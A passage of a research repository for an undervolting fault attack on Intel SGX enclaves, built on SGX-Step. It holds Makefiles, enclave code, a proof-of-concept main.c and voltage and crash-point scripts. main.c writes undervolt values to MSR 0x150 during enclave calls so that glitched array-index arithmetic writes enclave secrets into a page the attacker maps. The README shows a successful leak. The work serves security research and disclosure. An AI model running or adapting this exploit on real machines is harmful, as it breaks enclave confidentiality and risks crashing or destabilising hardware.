 61 | 	echo "$(INDENT)[CC] " $(subst .o,.c,$@) "(trusted edge)"
 62 | 	touch $(subst .o,.c,$@)
 63 | 	$(CC) -c $(INCLUDE) $(T_CFLAGS) $(subst .o,.c,$@)
 64 | 
 65 | %_u.o : $(subst .o,.c,$@) edger
 66 | 	echo "$(INDENT)[CC] " $(subst .o,.c,$@) "(untrusted edge)"
 67 | 	touch $(subst .o,.c,$@)
 68 | 	$(CC) -c $(INCLUDE) $(U_CFLAGS) $(subst .o,.c,$@)
 69 | 
 70 | %.o : %.c edger
 71 | 	echo "$(INDENT)[CC] " $< "(core)"
 72 | 	$(CC) $(INCLUDE) $(T_CFLAGS) -c $<
 73 | 
 74 | %.o : %.cpp
 75 | 	echo "$(INDENT)[CC] " $< "(core)"
 76 | 	$(CC) $(INCLUDE) $(T_CFLAGS) -c $<
 77 | 
 78 | 
 79 | %.o : %.S
 80 | 	echo "$(INDENT)[AS] " $< "(core)"
 81 | 	$(CC) $(INCLUDE) $(T_CFLAGS) -c $< -o $@
 82 | 
 83 | asm.s: build_asm.py
 84 | 	./build_asm.py
 85 | 
 86 | edger: $(ENCLAVE).edl
 87 | 	echo "$(INDENT)[GEN]" $(EDGER) $(ENCLAVE_EDL)
 88 | 	$(EDGER) $(ENCLAVE_EDL)
 89 | 
 90 | .PHONY: force_check
 91 | force_check:
 92 | 	true
 93 | 
 94 | .PHONY: scrub
 95 | scrub: 
 96 | 	echo "$(INDENT)[RM]  " $(PRIVATE_KEY) $(PUBLIC_KEY)
 97 | 	$(RM) $(PRIVATE_KEY) $(PUBLIC_KEY)
 98 | 
 99 | $(PRIVATE_KEY): 
100 | 	echo "$(INDENT)[GEN] $(PRIVATE_KEY) ($(KEY_SIZE) bits)"
101 | 
102 | 	# generate 3072 bit private RSA key
103 | 	openssl genrsa -out $(PRIVATE_KEY) -3 $(KEY_SIZE)
104 | 	
105 | 	echo "$(INDENT)[EXT] $(PUBLIC_KEY)"
106 | 	# extract public key
107 | 	openssl rsa -in $(PRIVATE_KEY) -pubout -out $(PUBLIC_KEY) 
108 | 	
109 | 	# sign enclave
110 | 	#sgx_sign sign -key private_key.pem -enclave Enclave/encl.so -out encl.signed.so
111 | 	
112 | .PHONY: clean
113 | clean:
114 | 	echo "$(INDENT)[RM]" $(OBJECTS) $(OUTPUT_T_UNSIG) $(OUTPUT_T) $(OUTPUT_U)
115 | 	$(RM) $(OBJECTS) $(OUTPUT_T_UNSIG) $(OUTPUT_T) $(OUTPUT_U)
116 | 	echo "$(INDENT)[RM]" $(TRUSTED_OBJECTS) $(UNTRUSTED_OBJECTS) $(TRUSTED_CODE) $(UNTRUSTED_CODE)
117 | 	$(RM) $(TRUSTED_OBJECTS) $(UNTRUSTED_OBJECTS) $(TRUSTED_CODE) $(UNTRUSTED_CODE)
118 | 


--------------------------------------------------------------------------------
/sgx_struct_array_index/Enclave/encl.config.xml:
--------------------------------------------------------------------------------
 1 | <!-- Please refer to User's Guide for the explanation of each field -->
 2 | <EnclaveConfiguration>
 3 |   <ProdID>0</ProdID>
 4 |   <ISVSVN>0</ISVSVN>
 5 |   <StackMaxSize>0x40000</StackMaxSize>
 6 |   <HeapMaxSize>0x400000</HeapMaxSize>
 7 |   <TCSNum>1</TCSNum>
 8 |   <TCSPolicy>1</TCSPolicy>
 9 |   <DisableDebug>0</DisableDebug>
10 | </EnclaveConfiguration>
11 | 


--------------------------------------------------------------------------------
/sgx_struct_array_index/Enclave/encl.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 |  *  This file is part of the SGX-Step enclave execution control framework.
 3 |  *
 4 |  *  Copyright (C) 2017 Jo Van Bulck <jo.vanbulck@cs.kuleuven.be>,
 5 |  *                     Raoul Strackx <raoul.strackx@cs.kuleuven.be>
 6 |  *
 7 |  *  SGX-Step is free software: you can redistribute it and/or modify
 8 |  *  it under the terms of the GNU General Public License as published by
 9 |  *  the Free Software Foundation, either version 3 of the License, or
10 |  *  (at your option) any later version.
11 |  *
12 |  *  SGX-Step is distributed in the hope that it will be useful,
13 |  *  but WITHOUT ANY WARRANTY; without even the implied warranty of
14 |  *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
15 |  *  GNU General Public License for more details.
16 |  *
17 |  *  You should have received a copy of the GNU General Public License
18 |  *  along with SGX-Step. If not, see <http://www.gnu.org/licenses/>.
19 |  */
20 | #include <stdio.h>
21 | #include <string.h>
22 | #include "sgx_tcrypto.h"
23 | #include "sgx_trts.h"
24 | #include "encl_t.h"	// for ocall
25 | 
26 | static void eprintf(const char *fmt, ...)
27 | {
28 | 	char buf[1000] = {'\0'};
29 | 	va_list ap;
30 | 	va_start(ap, fmt);
31 | 	vsnprintf(buf, 1000, fmt, ap);
32 | 	va_end(ap);
33 | 	ocall_print_string(buf);
34 | }
35 | 
36 | #define MAGIC_OFFSET 0x8ce05
37 | #define ARR_LEN     MAGIC_OFFSET + 50
38 | #define SECRET_LEN  8
39 | struct_foo_t secret_array[ARR_LEN];
40 | uint32_t enclave_secret = 0xdeadbeef;
41 | 
42 | __attribute__((optimize("O0"))) void do_init_secret(struct_foo_t *arr, uint64_t offset)
43 | {
44 |     for (int j = 0; j < SECRET_LEN; j++)
45 | 	{
46 | 		asm volatile("" ::: "memory"); 
47 | 		volatile struct_foo_t *foo = &arr[offset];
48 |         foo->foo[j] = enclave_secret + j;
49 | 		asm volatile("" ::: "memory"); 
50 | 	}
51 | }
52 | 
53 | __attribute__((optimize("O0"))) void my_ecall(void)
54 | {
55 |     for (int i = 0; i < 1000; i++)
56 | 	{
57 | 		asm volatile("" ::: "memory"); 
58 |         do_init_secret(secret_array, MAGIC_OFFSET);
59 | 		asm volatile("" ::: "memory"); 
60 | 	}
61 | }
62 | 


--------------------------------------------------------------------------------
/sgx_struct_array_index/Enclave/encl.edl:
--------------------------------------------------------------------------------
 1 | enclave {
 2 | 
 3 | 	struct struct_foo_t {
 4 |         /* Basic types can be used in structure. */
 5 |         uint32_t foo[8];
 6 | 		uint8_t foo2;
 7 |     };
 8 | 
 9 | 	trusted {
10 | 		public void my_ecall(void);
11 | 	};
12 | 	
13 | 	untrusted {
14 | 		void ocall_print_string([in, string] const char *str);
15 | 	};
16 | };
17 | 


--------------------------------------------------------------------------------
/sgx_struct_array_index/Makefile:
--------------------------------------------------------------------------------
 1 | LIBSGXSTEP_DIR       = ../sgx-step/
 2 | LIBSGXSTEP           = $(LIBSGXSTEP_DIR)/libsgxstep
 3 | URTS_LIB_PATH        = $(LIBSGXSTEP_DIR)/linux-sgx/psw/urts/linux
 4 | 
 5 | ifeq ($(SGX_SDK),)
 6 |     SGX_SDK          = /opt/intel/sgxsdk
 7 | endif
 8 | export SGX_SDK
 9 | ifneq ($(SGX_SDK), /opt/intel/sgxsdk)
10 |     URTS_LD_LIBRARY_PATH = LD_LIBRARY_PATH=$(LIBSGXSTEP_DIR)/linux-sgx/psw/urts/linux
11 | endif
12 | 
13 | ENCLAVE              = Enclave
14 | SUBDIRS              = $(ENCLAVE) $(LIBSGXSTEP)
15 | 
16 | CC                   = gcc
17 | AS                   = gcc
18 | LD                   = gcc
19 | 
20 | ifeq ($(M32), 1)
21 | 	CFLAGS   = -m32 -DM32=$(M32)
22 | 	LDFLAGS  = -m32
23 | else
24 | 	LIB_SUFX = 64
25 | endif
26 | 
27 | CFLAGS              += -fPIC -fno-stack-protector -fno-builtin -fno-jump-tables \
28 |                        -fno-common -Wno-attributes -g -D_GNU_SOURCE -O0
29 | INCLUDE             += -I$(SGX_SDK)/include/ -I$(LIBSGXSTEP_DIR) 
30 | LDFLAGS             += -lsgx-step -lencl_proxy -lsgx_urts \
31 |                        -lsgx_uae_service -pthread $(SUBDIRS:%=-L %) -L$(SGX_SDK)/lib$(LIB_SUFX)/ \
32 |                        -L$(LIBSGXSTEP_DIR)/linux-sgx/psw/urts/linux
33 | 
34 | SOURCES              = $(shell ls *.c)
35 | OBJECTS              = $(SOURCES:.c=.o)
36 | OUTPUT               = app
37 | 
38 | BUILDDIRS            = $(SUBDIRS:%=build-%)
39 | CLEANDIRS            = $(SUBDIRS:%=clean-%)
40 | 
41 | .SILENT:
42 | all: $(OUTPUT)
43 | 	
44 | run: clean all
45 | 	sudo $(URTS_LD_LIBRARY_PATH) taskset -c 0,2 ./$(OUTPUT) ${ARGS}
46 | 
47 | debug: clean all
48 | 	sudo `which sgx-gdb` ./$(OUTPUT)
49 | 
50 | $(OUTPUT): $(BUILDDIRS) $(OBJECTS)
51 | 	echo "$(INDENT)[LD]" $(OBJECTS) $(LIBS) -o $(OUTPUT) 
52 | 	$(LD) $(OBJECTS) $(LDFLAGS) -o $(OUTPUT) 
53 | 
54 | %.o : %.c
55 | 	echo "$(INDENT)[CC] " $<
56 | 	$(CC) $(CFLAGS) $(INCLUDE) -c $<
57 | 
58 | %.o : %.S
59 | 	echo "$(INDENT)[AS] " $<
60 | 	$(AS) $(INCLUDE) -c $< -o $@
61 | 
62 | clean: $(CLEANDIRS)
63 | 	echo "$(INDENT)[RM]" $(OBJECTS) $(OUTPUT)
64 | 	rm -f $(OBJECTS) $(OUTPUT)
65 | 
66 | $(BUILDDIRS):
67 | 	echo "$(INDENT)[===] $(@:build-%=%) [===]"
68 | 	$(MAKE) -C $(@:build-%=%) INDENT+="$(INDENT_STEP)" M32=$(M32) curr-dir=$(curr-dir)/$(@:build-%=%)
69 | 
70 | $(CLEANDIRS):
71 | 	echo "$(INDENT)[===] $(@:clean-%=%) [===]"
72 | 	$(MAKE) clean -C $(@:clean-%=%) INDENT+="$(INDENT_STEP)" curr-dir=$(curr-dir)/$(@:build-%=%)
73 | 


--------------------------------------------------------------------------------
/sgx_struct_array_index/README.md:
--------------------------------------------------------------------------------
  1 | # Example V.A: Faulting Array Index Addresses
  2 | 
  3 | As usual, you need SGX-Step. As usual, we assume it is in `../sgx-step/` - adapt the Makefile (`LIBSGXSTEP_DIR`) if needed. We also assume the SGX-SDK is correctly setup and the environment sourced.
  4 | 
  5 | Run on our i3-7100U-A at 1 GHz with -260 mV:
  6 | 
  7 | ```
  8 | Creating enclave...
  9 | ==== Victim Enclave ====
 10 | [pt.c] /dev/sgx-step opened!
 11 |     Base:   0x7fdbac000000
 12 |     Size:   33554432
 13 |     Limit:  0x7fdbae000000
 14 |     TCS:    0x7fdbada48000
 15 |     SSA:    0x7fdbada49f48
 16 |     AEP:    0x7fdbb136f73b
 17 |     EDBGRD: debug
 18 | [main.c] Done
 19 | [main.c] 10/10000
 20 | [main.c] 20/10000
 21 | [main.c] 30/10000
 22 | [main.c] 40/10000
 23 | [main.c] 50/10000
 24 | [main.c] 60/10000
 25 | [main.c] 70/10000
 26 | [main.c] 80/10000
 27 | Signal 11 received
 28 | siginfo address = 7fdbab5e7000
 29 | Will now map to 7fdbab5e7000
 30 | [main.c] Fault fault fault!!!
 31 | 0000000000000000000000000000000000000000000000000000000000000000
 32 | 0000000000000000000000000000000000000000000000000000000000000000
 33 | 0000000000000000000000000000000000000000000000000000000000000000
 34 | 0000000000000000000000000000000000000000000000000000000000000000
 35 | 0000000000000000000000000000000000000000000000000000000000000000
 36 | 0000000000000000000000000000000000000000000000000000000000000000
 37 | 0000000000000000000000000000000000000000000000000000000000000000
 38 | 0000000000000000000000000000000000000000000000000000000000000000
 39 | 0000000000000000000000000000000000000000000000000000000000000000
 40 | 0000000000000000000000000000000000000000000000000000000000000000
 41 | 0000000000000000000000000000000000000000000000000000000000000000
 42 | 0000000000000000000000000000000000000000000000000000000000000000
 43 | 0000000000000000000000000000000000000000000000000000000000000000
 44 | 0000000000000000000000000000000000000000000000000000000000000000
 45 | 000000000000000000000000000000000000000000000000f0beadde00000000
 46 | 0000000000000000000000000000000000000000000000000000000000000000
 47 | 0000000000000000000000000000000000000000000000000000000000000000
 48 | 0000000000000000000000000000000000000000000000000000000000000000
 49 | 0000000000000000000000000000000000000000000000000000000000000000
 50 | 0000000000000000000000000000000000000000000000000000000000000000
 51 | 0000000000000000000000000000000000000000000000000000000000000000
 52 | 0000000000000000000000000000000000000000000000000000000000000000
 53 | 0000000000000000000000000000000000000000000000000000000000000000
 54 | 0000000000000000000000000000000000000000000000000000000000000000
 55 | 0000000000000000000000000000000000000000000000000000000000000000
 56 | 0000000000000000000000000000000000000000000000000000000000000000
 57 | 0000000000000000000000000000000000000000000000000000000000000000
 58 | 0000000000000000000000000000000000000000000000000000000000000000
 59 | 0000000000000000000000000000000000000000000000000000000000000000
 60 | 0000000000000000000000000000000000000000000000000000000000000000
 61 | 0000000000000000000000000000000000000000000000000000000000000000
 62 | 0000000000000000000000000000000000000000000000000000000000000000
 63 | 0000000000000000000000000000000000000000000000000000000000000000
 64 | 0000000000000000000000000000000000000000000000000000000000000000
 65 | 0000000000000000000000000000000000000000000000000000000000000000
 66 | 0000000000000000000000000000000000000000000000000000000000000000
 67 | 0000000000000000000000000000000000000000000000000000000000000000
 68 | 0000000000000000000000000000000000000000000000000000000000000000
 69 | 0000000000000000000000000000000000000000000000000000000000000000
 70 | 0000000000000000000000000000000000000000000000000000000000000000
 71 | 0000000000000000000000000000000000000000000000000000000000000000
 72 | 0000000000000000000000000000000000000000000000000000000000000000
 73 | 0000000000000000000000000000000000000000000000000000000000000000
 74 | 0000000000000000000000000000000000000000000000000000000000000000
 75 | 0000000000000000000000000000000000000000000000000000000000000000
 76 | 0000000000000000000000000000000000000000000000000000000000000000
 77 | 0000000000000000000000000000000000000000000000000000000000000000
 78 | 0000000000000000000000000000000000000000000000000000000000000000
 79 | 0000000000000000000000000000000000000000000000000000000000000000
 80 | 0000000000000000000000000000000000000000000000000000000000000000
 81 | 0000000000000000000000000000000000000000000000000000000000000000
 82 | 0000000000000000000000000000000000000000000000000000000000000000
 83 | 0000000000000000000000000000000000000000000000000000000000000000
 84 | 0000000000000000000000000000000000000000000000000000000000000000
 85 | 0000000000000000000000000000000000000000000000000000000000000000
 86 | 0000000000000000000000000000000000000000000000000000000000000000
 87 | 0000000000000000000000000000000000000000000000000000000000000000
 88 | 0000000000000000000000000000000000000000000000000000000000000000
 89 | 0000000000000000000000000000000000000000000000000000000000000000
 90 | 0000000000000000000000000000000000000000000000000000000000000000
 91 | 0000000000000000000000000000000000000000000000000000000000000000
 92 | 0000000000000000000000000000000000000000000000000000000000000000
 93 | 0000000000000000000000000000000000000000000000000000000000000000
 94 | 0000000000000000000000000000000000000000000000000000000000000000
 95 | 0000000000000000000000000000000000000000000000000000000000000000
 96 | 0000000000000000000000000000000000000000000000000000000000000000
 97 | 0000000000000000000000000000000000000000000000000000000000000000
 98 | 0000000000000000000000000000000000000000000000000000000000000000
 99 | 0000000000000000000000000000000000000000000000000000000000000000
100 | 0000000000000000000000000000000000000000000000000000000000000000
101 | 0000000000000000000000000000000000000000000000000000000000000000
102 | 0000000000000000000000000000000000000000000000000000000000000000
103 | 0000000000000000000000000000000000000000000000000000000000000000
104 | 0000000000000000000000000000000000000000000000000000000000000000
105 | 0000000000000000000000000000000000000000000000000000000000000000
106 | 0000000000000000000000000000000000000000000000000000000000000000
107 | 0000000000000000000000000000000000000000000000000000000000000000
108 | 0000000000000000000000000000000000000000000000000000000000000000
109 | 0000000000000000000000000000000000000000000000000000000000000000
110 | 0000000000000000000000000000000000000000000000000000000000000000
111 | 0000000000000000000000000000000000000000000000000000000000000000
112 | 0000000000000000000000000000000000000000000000000000000000000000
113 | 0000000000000000000000000000000000000000000000000000000000000000
114 | 0000000000000000000000000000000000000000000000000000000000000000
115 | 0000000000000000000000000000000000000000000000000000000000000000
116 | 0000000000000000000000000000000000000000000000000000000000000000
117 | 0000000000000000000000000000000000000000000000000000000000000000
118 | 0000000000000000000000000000000000000000000000000000000000000000
119 | 0000000000000000000000000000000000000000000000000000000000000000
120 | 0000000000000000000000000000000000000000000000000000000000000000
121 | 0000000000000000000000000000000000000000000000000000000000000000
122 | 0000000000000000000000000000000000000000000000000000000000000000
123 | 0000000000000000000000000000000000000000000000000000000000000000
124 | 0000000000000000000000000000000000000000000000000000000000000000
125 | 0000000000000000000000000000000000000000000000000000000000000000
126 | 0000000000000000000000000000000000000000000000000000000000000000
127 | 0000000000000000000000000000000000000000000000000000000000000000
128 | 0000000000000000000000000000000000000000000000000000000000000000
129 | 0000000000000000000000000000000000000000000000000000000000000000
130 | 0000000000000000000000000000000000000000000000000000000000000000
131 | 0000000000000000000000000000000000000000000000000000000000000000
132 | 0000000000000000000000000000000000000000000000000000000000000000
133 | 0000000000000000000000000000000000000000000000000000000000000000
134 | 0000000000000000000000000000000000000000000000000000000000000000
135 | 0000000000000000000000000000000000000000000000000000000000000000
136 | 0000000000000000000000000000000000000000000000000000000000000000
137 | 0000000000000000000000000000000000000000000000000000000000000000
138 | 0000000000000000000000000000000000000000000000000000000000000000
139 | 0000000000000000000000000000000000000000000000000000000000000000
140 | 0000000000000000000000000000000000000000000000000000000000000000
141 | 0000000000000000000000000000000000000000000000000000000000000000
142 | 0000000000000000000000000000000000000000000000000000000000000000
143 | 0000000000000000000000000000000000000000000000000000000000000000
144 | 0000000000000000000000000000000000000000000000000000000000000000
145 | 0000000000000000000000000000000000000000000000000000000000000000
146 | 0000000000000000000000000000000000000000000000000000000000000000
147 | 0000000000000000000000000000000000000000000000000000000000000000
148 | 0000000000000000000000000000000000000000000000000000000000000000
149 | 0000000000000000000000000000000000000000000000000000000000000000
150 | 0000000000000000000000000000000000000000000000000000000000000000
151 | 0000000000000000000000000000000000000000000000000000000000000000
152 | 0000000000000000000000000000000000000000000000000000000000000000
153 | 0000000000000000000000000000000000000000000000000000000000000000
154 | 0000000000000000000000000000000000000000000000000000000000000000
155 | 0000000000000000000000000000000000000000000000000000000000000000
156 | 0000000000000000000000000000000000000000000000000000000000000000
157 | 0000000000000000000000000000000000000000000000000000000000000000
158 | 0000000000000000000000000000000000000000000000000000000000000000
159 | [main.c] Done.
160 | 
161 | coretemp-isa-0000
162 | Adapter: ISA adapter
163 | Package id 0:  +39.0°C  (high = +100.0°C, crit = +100.0°C)
164 | Core 0:        +38.0°C  (high = +100.0°C, crit = +100.0°C)
165 | Core 1:        +39.0°C  (high = +100.0°C, crit = +100.0°C)
166 | 
167 | ```
168 | 


--------------------------------------------------------------------------------
/sgx_struct_array_index/main.c:
--------------------------------------------------------------------------------
  1 | /*
  2 |  *  This file is part of the SGX-Step enclave execution control framework.
  3 |  *
  4 |  *  Copyright (C) 2017 Jo Van Bulck <jo.vanbulck@cs.kuleuven.be>,
  5 |  *                     Raoul Strackx <raoul.strackx@cs.kuleuven.be>
  6 |  *
  7 |  *  SGX-Step is free software: you can redistribute it and/or modify
  8 |  *  it under the terms of the GNU General Public License as published by
  9 |  *  the Free Software Foundation, either version 3 of the License, or
 10 |  *  (at your option) any later version.
 11 |  *
 12 |  *  SGX-Step is distributed in the hope that it will be useful,
 13 |  *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 14 |  *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 15 |  *  GNU General Public License for more details.
 16 |  *
 17 |  *  You should have received a copy of the GNU General Public License
 18 |  *  along with SGX-Step. If not, see <http://www.gnu.org/licenses/>.
 19 |  */
 20 | 
 21 | #include <sgx_urts.h>
 22 | #include "Enclave/encl_u.h"
 23 | #include <sys/mman.h>
 24 | #include <signal.h>
 25 | 
 26 | #include "libsgxstep/enclave.h"
 27 | #include "libsgxstep/debug.h"
 28 | #include "libsgxstep/pt.h"
 29 | #include "libsgxstep/sched.h"
 30 | 
 31 | #include <stdint.h>
 32 | #include <stdio.h>
 33 | #include <fcntl.h>
 34 | #include <unistd.h>
 35 | #include <stdlib.h>
 36 | #include <inttypes.h>
 37 | #include <time.h>
 38 | #include <pthread.h>
 39 | 
 40 | int64_t my_round(float num)
 41 | {
 42 |     return num < 0 ? num - 0.5 : num + 0.5;
 43 | }
 44 | 
 45 | volatile uint64_t not_used = 0xdead;
 46 | 
 47 | void pause_it(int pause_iterations)
 48 | {
 49 | 	for (int j = 0; j < pause_iterations; j++)
 50 | 	{
 51 | 		not_used = not_used * 0x12345;
 52 | 	}
 53 | }
 54 | 
 55 | 
 56 | static uint64_t multiply_it(int iterations)
 57 | {
 58 |     const uint64_t mul1 = 0x08ce05, mul2 = 0x24;
 59 |     volatile uint64_t var = mul1;
 60 | 
 61 |     uint64_t random_value = mul2;
 62 |     var = mul1 * random_value;
 63 |     int i = 0;
 64 |     while (var == mul1 * random_value && i < iterations)
 65 |     {
 66 |         i++;
 67 |         var = mul1;
 68 |         var *= random_value;
 69 |     }
 70 | 
 71 |     uint64_t diff = var ^ (mul1 * random_value);
 72 | 
 73 |     if(diff != 0)
 74 |     {
 75 |       printf("%ld iterations\n", i);
 76 |       printf("Computed: %016llx\n", var);
 77 |       printf("Expected: %016llx\n", mul1 * random_value);
 78 | 
 79 |       var ^= mul1 * random_value;
 80 | 
 81 |       printf("Diff:     %016llx\n", var);
 82 |     }
 83 |     return var;
 84 | }
 85 | 
 86 | 
 87 | uint64_t wrmsr_value(char* in,uint64_t plane)
 88 | {
 89 |       int64_t val=strtol(in,NULL,10);
 90 |       val=my_round(val*1.024);
 91 |       val=0xFFE00000&((val&0xFFF)<<21);
 92 |       val=val|0x8000001100000000;
 93 |       val=val|(plane<<40);
 94 |       return (uint64_t)val;
 95 | }
 96 | 
 97 | /* OCall functions */
 98 | void ocall_print_string(const char *str)
 99 | {
100 | 	/* Proxy/Bridge will check the length and null-terminate 
101 | 	 * the input string to prevent buffer overflow. 
102 | 	 */
103 | 	printf("\t[Enclave] %s\n", str);
104 | }
105 | 
106 | static void hexdump(uint8_t* a, size_t cnt)
107 | {
108 | 	for(size_t i = 0; i < cnt; i++)
109 | 	{
110 | 		if(i % 16 == 0 && i != 0)
111 | 		{
112 | 			printf("\n");
113 | 		}
114 | 		printf("%02x ", a[i]);
115 | 	}
116 | }
117 | 
118 | volatile int flag1 = 0, flag2 = 0;
119 | int fd0 = 0;
120 | 
121 | uint64_t val_plane0 = 0;
122 | uint64_t val_plane2 = 0;
123 | uint64_t val_zero_plane0 = 0;
124 | uint64_t val_zero_plane2 = 0;
125 | uint64_t tick = 0;
126 | 
127 | #define VICTIM_CPU0 0
128 | #define VICTIM_CPU1 0
129 | 
130 | #define TICK_MAX (68120)
131 | 
132 | void *faulting_thread(void *input)
133 | {
134 | 	const uint64_t mul1 = 0x08ce05, mul2 = 0x24;
135 |     volatile uint64_t var = mul1;
136 |     volatile uint64_t random_value = mul2;
137 | 
138 |     tick = 0;
139 | 
140 |     flag2++;
141 |     asm volatile("" ::: "memory"); 
142 | 
143 |     while(flag1 == 0);
144 |     asm volatile("" ::: "memory"); 
145 | 
146 |     while(flag1 == 1 && tick < TICK_MAX)
147 |     {
148 |         tick++;
149 |     }
150 |     asm volatile("" ::: "memory"); 
151 | 
152 |     // voltage back up
153 |     pwrite(fd0,&val_zero_plane0,sizeof val_zero_plane0,0x150);
154 |     pwrite(fd0,&val_zero_plane2,sizeof val_zero_plane2,0x150);
155 | 	//info("Voltage upped");
156 | 
157 |     // info("Thread exiting");
158 | 
159 |     return 0;
160 | }
161 | 
162 | // Handle the page fault in thread dummy_page
163 | static uint8_t page_mapped = 0;
164 | static void* page = 0;
165 | 
166 | void fault_handler(int signo, siginfo_t *info, void *extra)
167 | {
168 | 	pwrite(fd0,&val_zero_plane0,sizeof val_zero_plane0,0x150);
169 | 	pwrite(fd0,&val_zero_plane2,sizeof val_zero_plane2,0x150);
170 | 	
171 | 	ucontext_t *p=(ucontext_t *)extra;
172 | 	int x;
173 | 
174 | 	printf("Signal %d received\n", signo);
175 | 	printf("siginfo address = %lx\n", info->si_addr);
176 | 
177 | 
178 | 	uint64_t page_addr = (((uint64_t)info->si_addr) & ~(getpagesize()-1));
179 | 	printf("Will now map to %lx\n", page_addr);
180 | 
181 | 	page = mmap((void*)page_addr, getpagesize(), PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
182 | 
183 | 	if(page == MAP_FAILED)
184 | 	{
185 | 		perror("mmap() failed");
186 | 	}
187 | 
188 | 	page_mapped = 1;
189 | 
190 | 	//exit(1);
191 | }
192 | 
193 | int main(int argc, char **argv)
194 | {
195 | 	sgx_launch_token_t token = {0};
196 | 	int retval = 0, updated = 0;
197 | 	char old = 0x00, new = 0xbb;
198 | 	sgx_enclave_id_t eid = 0;
199 | 	uint8_t ret = 0;
200 | 	pthread_t t1;
201 | 
202 |     const char* program = argv[0];
203 | 
204 |     if (argc != 3)
205 |     {
206 |         printf("Need 2 args: %s iterations offset\n",program);
207 |         exit (-1);
208 |     }
209 | 
210 | 	val_plane0 = wrmsr_value(argv[2],0);
211 |     val_plane2 = wrmsr_value(argv[2],2);
212 | 
213 |     uint32_t iterations = atoi(argv[1]);
214 |     uint32_t iterations_50k = 50000-iterations;
215 | 
216 |     val_zero_plane0 = wrmsr_value("0",0);
217 |     val_zero_plane2 = wrmsr_value("0",2);
218 | 
219 |     fd0 = open("/dev/cpu/0/msr", O_WRONLY);
220 | 
221 |     if(fd0 == -1)
222 |     {
223 |         printf("Could not open /dev/cpu/0/msr\n");
224 |         return -1;
225 |     }
226 | 
227 | 	printf("Creating enclave...\n");
228 | 
229 | 	SGX_ASSERT( sgx_create_enclave( "./Enclave/encl.so", /*debug=*/ 1,
230 | 		&token, &updated, &eid, NULL ) );
231 | 
232 | 	print_enclave_info();
233 | 
234 | 	// Install pf handler
235 | 	struct sigaction sa;
236 |     sa.sa_flags = SA_SIGINFO;
237 |     sigemptyset(&sa.sa_mask);
238 |     sa.sa_sigaction = fault_handler;
239 | 	if (sigaction(SIGSEGV, &sa, NULL) == -1) {
240 | 		perror("sigusr: sigaction");
241 | 		exit(1);
242 | 	}
243 | 
244 | 	info("Done");
245 | 
246 | 	for(int i = 0; i < iterations && page_mapped == 0 ; i++)
247 | 	{
248 | 		if(i % 10 == 0 && i != 0)
249 | 		{
250 | 			info("%d/%d", i, iterations);
251 | 		}
252 | 
253 | 		if(i > 5)
254 | 		{
255 | 			pwrite(fd0,&val_plane0,sizeof val_plane0,0x150);
256 | 			pwrite(fd0,&val_plane2,sizeof val_plane2,0x150);
257 | 		}
258 | 
259 | 		
260 | 		asm volatile("" ::: "memory"); 
261 | 		SGX_ASSERT( my_ecall(eid) );
262 | 		asm volatile("" ::: "memory"); 
263 | 		
264 | 		pwrite(fd0,&val_zero_plane0,sizeof val_zero_plane0,0x150);
265 | 		pwrite(fd0,&val_zero_plane2,sizeof val_zero_plane2,0x150);
266 | 
267 | 		pause_it(5000);
268 | 	}
269 | 
270 | 	if(page_mapped != 0)
271 | 	{
272 | 		info("Fault fault fault!!!");
273 | 
274 | 		uint8_t* pp = (uint8_t*) page;
275 | 		for(int k = 0; k < getpagesize(); k++)
276 | 		{
277 | 			printf("%02x", pp[k]);
278 | 			if(k % 32 == 31)
279 | 				printf("\n");
280 | 		}
281 | 	}
282 | 
283 | 
284 |     close(fd0);
285 | 
286 |     info("Done.");
287 | 
288 | done:
289 | 
290 | 	SGX_ASSERT( sgx_destroy_enclave(eid) );
291 | 	return 0;
292 | }
293 | 


--------------------------------------------------------------------------------
/utils/0x198_read_msr.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | while [ 1==1 ]
 3 | do
 4 |     val=0x`sudo rdmsr 0x198`
 5 |     new_val=$(((val & 0xFFFF00000000) >> 32))
 6 | 	floating_val=`echo  "scale=3; $new_val/8192" | bc`
 7 |     printf "\nreading msr register 0x198. Voltage: $floating_val" 
 8 |     sleep 1  
 9 | done
10 | 


--------------------------------------------------------------------------------
/utils/Makefile:
--------------------------------------------------------------------------------
 1 | CFLAGS = -Wall 
 2 | LFLAGS = -lncurses
 3 | 
 4 | all:	read_voltage
 5 | 
 6 | read_voltage:	read_voltage.o
 7 | 	gcc $(CFLAGS) -o read_voltage read_voltage.o $(LFLAGS)
 8 | 
 9 | read_voltage.o:	read_voltage.c
10 | 	gcc $(CFLAGS) -c -o read_voltage.o read_voltage.c
11 | 
12 | clean:
13 | 	rm *.o
14 | 


--------------------------------------------------------------------------------
/utils/find_crash_point.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | undervoltage=-140
 3 | last_frequency_tested="0.3GHz"
 4 | very_last_frequency="2.4GHz"
 5 | 
 6 | if [ -f "keeping_tab/last_frequency_tested" ];
 7 | then
 8 | 	last_frequency_tested=`cat keeping_tab/last_frequency_tested`
 9 | 	echo >> keeping_tab/fault_results
10 | 	echo "******************************************" >> keeping_tab/fault_results 
11 | 	echo "Restarting. Assume recovered from crash" >> keeping_tab/fault_results 
12 | fi
13 | echo "last frequency tested: $last_frequency_tested"
14 | 
15 | 
16 | if [[ $last_frequency_tested == $very_last_frequency ]];
17 | then
18 | 	echo "You're all done!"
19 | 	rm keeping_tab/last_frequency_tested
20 | 	exit
21 | fi
22 | freq=`grep -A1 "^$last_frequency_tested" keeping_tab/frequencies.txt | grep -v "^$last_frequency_tested"`
23 | echo "New frequency: $freq"
24 | echo "New frequency: $freq" >> keeping_tab/fault_results
25 | echo "$freq" > keeping_tab/last_frequency_tested
26 | 
27 | sudo cpupower -c all frequency-set -u $freq
28 | sudo cpupower -c all frequency-set -d $freq
29 | # Repeated because sometimes it doesn't work
30 | sudo cpupower -c all frequency-set -u $freq
31 | sudo cpupower -c all frequency-set -d $freq
32 | while true
33 | do
34 | 	sleep 1
35 | 	undervoltage=$((undervoltage-1))
36 | 	val=0x`sudo rdmsr 0x198`
37 | 	new_val=$(((val & 0xFFFF00000000) >> 32))
38 | 	floating_val=`echo  "scale=3; $new_val/8192" | bc`
